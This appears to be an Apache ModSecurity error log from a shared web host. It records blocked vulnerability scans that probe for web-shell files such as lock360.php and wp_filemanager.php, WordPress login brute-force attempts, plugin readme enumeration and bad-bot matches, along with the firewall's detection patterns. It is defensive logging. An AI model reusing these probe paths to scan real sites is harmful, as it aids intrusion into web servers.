[Tue May 26 18:51:09.958142 2026] [security2:error] [pid 1036960:tid 1037091] [client 45.154.98.150:53776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWeRYGNKXNii6nttH9JzgAAAIY"]
[Tue May 26 18:51:10.067509 2026] [security2:error] [pid 1036960:tid 1037137] [client 45.154.98.150:53749] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWeRYGNKXNii6nttH9JygAAALQ"], referer: www.google.com
[Tue May 26 18:51:10.405398 2026] [security2:error] [pid 1036960:tid 1037141] [client 45.154.98.150:51082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWeRoGNKXNii6nttH9J3gAAALg"], referer: www.google.com
[Tue May 26 18:51:10.739867 2026] [security2:error] [pid 1036960:tid 1037138] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeRoGNKXNii6nttH9J3AAAALU"]
[Tue May 26 18:51:10.848602 2026] [security2:error] [pid 1036960:tid 1037192] [client 45.154.98.150:53749] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWeRoGNKXNii6nttH9J6QAAAOs"], referer: www.google.com
[Tue May 26 18:51:11.656990 2026] [security2:error] [pid 1036960:tid 1037137] [client 45.154.98.150:53754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWeR4GNKXNii6nttH9KCQAAALQ"]
[Tue May 26 18:51:12.041005 2026] [security2:error] [pid 1036960:tid 1037144] [client 45.154.98.150:62537] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/bifeetgq.php"] [unique_id "ahWeSIGNKXNii6nttH9KIQAAALs"], referer: www.google.com
[Tue May 26 18:51:12.221483 2026] [security2:error] [pid 1036960:tid 1037052] [remote 194.213.4.139:36716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeSIGNKXNii6nttH9KIgAA_ls"]
[Tue May 26 18:51:12.337442 2026] [security2:error] [pid 1036960:tid 1037192] [client 45.154.98.150:54610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWeSIGNKXNii6nttH9KMAAAAOs"]
[Tue May 26 18:51:12.523018 2026] [security2:error] [pid 1036960:tid 1037216] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeSIGNKXNii6nttH9KJQAAAQM"]
[Tue May 26 18:51:13.441469 2026] [security2:error] [pid 1036960:tid 1037112] [client 45.154.98.150:62913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-plain.php"] [unique_id "ahWeSYGNKXNii6nttH9KSwAAAJs"], referer: www.google.com
[Tue May 26 18:51:13.768221 2026] [security2:error] [pid 1036960:tid 1037214] [client 68.183.88.172:34304] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "nicmaperu.com"] [uri "/"] [unique_id "ahWeSYGNKXNii6nttH9KTwAAAQE"]
[Tue May 26 18:51:14.111856 2026] [security2:error] [pid 1036960:tid 1037209] [client 45.154.98.150:49300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWeSoGNKXNii6nttH9KVgAAAPw"]
[Tue May 26 18:51:14.704930 2026] [security2:error] [pid 1036960:tid 1037116] [client 45.154.98.150:55816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/vcopsrdv.php"] [unique_id "ahWeSoGNKXNii6nttH9KaQAAAJ8"], referer: www.google.com
[Tue May 26 18:51:15.206376 2026] [security2:error] [pid 1036960:tid 1037152] [client 45.154.98.150:62494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWeS4GNKXNii6nttH9KewAAAMM"]
[Tue May 26 18:51:15.922002 2026] [security2:error] [pid 1036960:tid 1037128] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeS4GNKXNii6nttH9KigAAAKs"]
[Tue May 26 18:51:16.701427 2026] [security2:error] [pid 1036960:tid 1037131] [client 74.7.230.0:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWeS4GNKXNii6nttH9KegAAAK4"]
[Tue May 26 18:51:16.701449 2026] [security2:error] [pid 1036960:tid 1037131] [client 74.7.230.0:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWeS4GNKXNii6nttH9KegAAAK4"]
[Tue May 26 18:51:16.702054 2026] [security2:error] [pid 1036960:tid 1037195] [client 74.7.230.0:55504] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWeS4GNKXNii6nttH9KeAAA7lk"]
[Tue May 26 18:51:16.763979 2026] [security2:error] [pid 1036960:tid 1037070] [remote 194.213.4.139:36716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeTIGNKXNii6nttH9KswAAk20"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:51:16.865704 2026] [security2:error] [pid 1036960:tid 1037127] [client 185.191.171.13:32950] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/10/"] [unique_id "ahWeTIGNKXNii6nttH9KtwAAAKo"]
[Tue May 26 18:51:16.865837 2026] [security2:error] [pid 1036960:tid 1037127] [client 185.191.171.13:32950] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/10/"] [unique_id "ahWeTIGNKXNii6nttH9KtwAAAKo"]
[Tue May 26 18:51:17.002438 2026] [security2:error] [pid 1036960:tid 1037178] [client 74.7.230.0:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWeTIGNKXNii6nttH9KugAAAN0"], referer: https://www.theafterglow-centre.com/robots.txt
[Tue May 26 18:51:17.003218 2026] [security2:error] [pid 1036960:tid 1037126] [client 74.7.230.0:55510] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWeTIGNKXNii6nttH9KuAAAqW4"], referer: https://www.theafterglow-centre.com/robots.txt
[Tue May 26 18:51:17.018253 2026] [security2:error] [pid 1036960:tid 1037144] [client 63.178.84.147:23688] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWeTIGNKXNii6nttH9KpwAAALs"], referer: https://thegoodsporting.com
[Tue May 26 18:51:17.407465 2026] [security2:error] [pid 1036960:tid 1037119] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeTIGNKXNii6nttH9KvQAAAKI"]
[Tue May 26 18:51:18.326575 2026] [security2:error] [pid 1036960:tid 1037084] [remote 14.161.17.36:44374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeToGNKXNii6nttH9K3QAAiHs"]
[Tue May 26 18:51:19.940744 2026] [security2:error] [pid 1036960:tid 1036976] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeT4GNKXNii6nttH9LGwAApg8"]
[Tue May 26 18:51:19.940944 2026] [security2:error] [pid 1036960:tid 1037123] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeT4GNKXNii6nttH9LGwAApg8"]
[Tue May 26 18:51:20.179154 2026] [security2:error] [pid 1036960:tid 1037200] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeT4GNKXNii6nttH9LGgAAAPM"]
[Tue May 26 18:51:20.536371 2026] [security2:error] [pid 1036960:tid 1037203] [client 76.119.38.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeUIGNKXNii6nttH9LHgAAAPY"]
[Tue May 26 18:51:21.177928 2026] [security2:error] [pid 1036960:tid 1037190] [client 82.41.255.204:27095] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "haddingtonwines.com"] [uri "/wp-content/plugins/contact-form-7/readme.txt"] [unique_id "ahWeUYGNKXNii6nttH9LPgAAAOk"]
[Tue May 26 18:51:21.403890 2026] [security2:error] [pid 1036960:tid 1037212] [client 82.41.255.204:29709] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "haddingtonwines.com"] [uri "/wp-content/plugins/woocommerce/readme.txt"] [unique_id "ahWeUYGNKXNii6nttH9LQwAAAP8"]
[Tue May 26 18:51:21.796172 2026] [security2:error] [pid 1036960:tid 1037102] [client 82.41.255.204:40167] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "haddingtonwines.com"] [uri "/wp-content/plugins/rit-core/readme.txt"] [unique_id "ahWeUYGNKXNii6nttH9LTwAAAJE"]
[Tue May 26 18:51:21.875302 2026] [security2:error] [pid 1036960:tid 1037109] [client 192.178.8.102:56464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 102.8.178.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWeUYGNKXNii6nttH9LRwAAAJg"]
[Tue May 26 18:51:22.006064 2026] [security2:error] [pid 1036960:tid 1037143] [client 82.41.255.204:23879] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "haddingtonwines.com"] [uri "/wp-content/plugins/js_composer/readme.txt"] [unique_id "ahWeUoGNKXNii6nttH9LUgAAALo"]
[Tue May 26 18:51:22.392297 2026] [security2:error] [pid 1036960:tid 1037189] [client 82.41.255.204:29975] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "haddingtonwines.com"] [uri "/wp-content/plugins/revslider/readme.txt"] [unique_id "ahWeUoGNKXNii6nttH9LXwAAAOg"]
[Tue May 26 18:51:22.599378 2026] [security2:error] [pid 1036960:tid 1037090] [client 82.41.255.204:17837] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "haddingtonwines.com"] [uri "/wp-content/plugins/megamenu/readme.txt"] [unique_id "ahWeUoGNKXNii6nttH9LZAAAAIU"]
[Tue May 26 18:51:22.606611 2026] [security2:error] [pid 1036960:tid 1037201] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeUoGNKXNii6nttH9LWAAAAPQ"]
[Tue May 26 18:51:24.168012 2026] [security2:error] [pid 1036960:tid 1037198] [client 191.232.213.243:12481] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWeVIGNKXNii6nttH9LkAAAAPE"]
[Tue May 26 18:51:24.168166 2026] [security2:error] [pid 1036960:tid 1037198] [client 191.232.213.243:12481] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWeVIGNKXNii6nttH9LkAAAAPE"]
[Tue May 26 18:51:24.523150 2026] [security2:error] [pid 1036960:tid 1037195] [client 191.232.213.243:12482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/wp-conflg.php"] [unique_id "ahWeVIGNKXNii6nttH9LngAAAO4"]
[Tue May 26 18:51:24.523333 2026] [security2:error] [pid 1036960:tid 1037195] [client 191.232.213.243:12482] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/wp-conflg.php"] [unique_id "ahWeVIGNKXNii6nttH9LngAAAO4"]
[Tue May 26 18:51:24.856137 2026] [security2:error] [pid 1036960:tid 1037158] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeVIGNKXNii6nttH9LlwAAAMk"]
[Tue May 26 18:51:24.894545 2026] [security2:error] [pid 1036960:tid 1037155] [client 191.232.213.243:12500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/an.php"] [unique_id "ahWeVIGNKXNii6nttH9LqgAAAMY"]
[Tue May 26 18:51:24.894688 2026] [security2:error] [pid 1036960:tid 1037155] [client 191.232.213.243:12500] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/an.php"] [unique_id "ahWeVIGNKXNii6nttH9LqgAAAMY"]
[Tue May 26 18:51:25.260810 2026] [security2:error] [pid 1036960:tid 1037192] [client 191.232.213.243:7594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/ma.php"] [unique_id "ahWeVYGNKXNii6nttH9LtgAAAOs"]
[Tue May 26 18:51:25.260932 2026] [security2:error] [pid 1036960:tid 1037192] [client 191.232.213.243:7594] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/ma.php"] [unique_id "ahWeVYGNKXNii6nttH9LtgAAAOs"]
[Tue May 26 18:51:25.627251 2026] [security2:error] [pid 1036960:tid 1037143] [client 191.232.213.243:7570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/gm.php"] [unique_id "ahWeVYGNKXNii6nttH9LwwAAALo"]
[Tue May 26 18:51:25.627357 2026] [security2:error] [pid 1036960:tid 1037143] [client 191.232.213.243:7570] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/gm.php"] [unique_id "ahWeVYGNKXNii6nttH9LwwAAALo"]
[Tue May 26 18:51:25.980002 2026] [security2:error] [pid 1036960:tid 1037097] [client 191.232.213.243:2106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/lock360.php"] [unique_id "ahWeVYGNKXNii6nttH9LzAAAAIw"]
[Tue May 26 18:51:25.980119 2026] [security2:error] [pid 1036960:tid 1037097] [client 191.232.213.243:2106] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/lock360.php"] [unique_id "ahWeVYGNKXNii6nttH9LzAAAAIw"]
[Tue May 26 18:51:26.211103 2026] [security2:error] [pid 1036960:tid 1036994] [remote 74.7.241.58:36454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWeVoGNKXNii6nttH9L1gAA7iE"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/mailchimp-for-wp/integrations/wpforms
[Tue May 26 18:51:26.338325 2026] [security2:error] [pid 1036960:tid 1037115] [client 191.232.213.243:7574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/ppx.php"] [unique_id "ahWeVoGNKXNii6nttH9L3QAAAJ4"]
[Tue May 26 18:51:26.338429 2026] [security2:error] [pid 1036960:tid 1037115] [client 191.232.213.243:7574] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/ppx.php"] [unique_id "ahWeVoGNKXNii6nttH9L3QAAAJ4"]
[Tue May 26 18:51:26.574597 2026] [security2:error] [pid 1036960:tid 1037123] [client 144.31.188.34:48056] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeVYGNKXNii6nttH9LxwAAAKY"]
[Tue May 26 18:51:26.624878 2026] [security2:error] [pid 1036960:tid 1037123] [client 144.31.188.34:48056] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeVYGNKXNii6nttH9LxwAAAKY"]
[Tue May 26 18:51:26.710973 2026] [security2:error] [pid 1036960:tid 1037107] [client 191.232.213.243:12549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahWeVoGNKXNii6nttH9L5wAAAJY"]
[Tue May 26 18:51:26.711081 2026] [security2:error] [pid 1036960:tid 1037107] [client 191.232.213.243:12549] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahWeVoGNKXNii6nttH9L5wAAAJY"]
[Tue May 26 18:51:27.075836 2026] [security2:error] [pid 1036960:tid 1037140] [client 191.232.213.243:7604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/filexp.php"] [unique_id "ahWeV4GNKXNii6nttH9L7AAAALc"]
[Tue May 26 18:51:27.075979 2026] [security2:error] [pid 1036960:tid 1037140] [client 191.232.213.243:7604] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/filexp.php"] [unique_id "ahWeV4GNKXNii6nttH9L7AAAALc"]
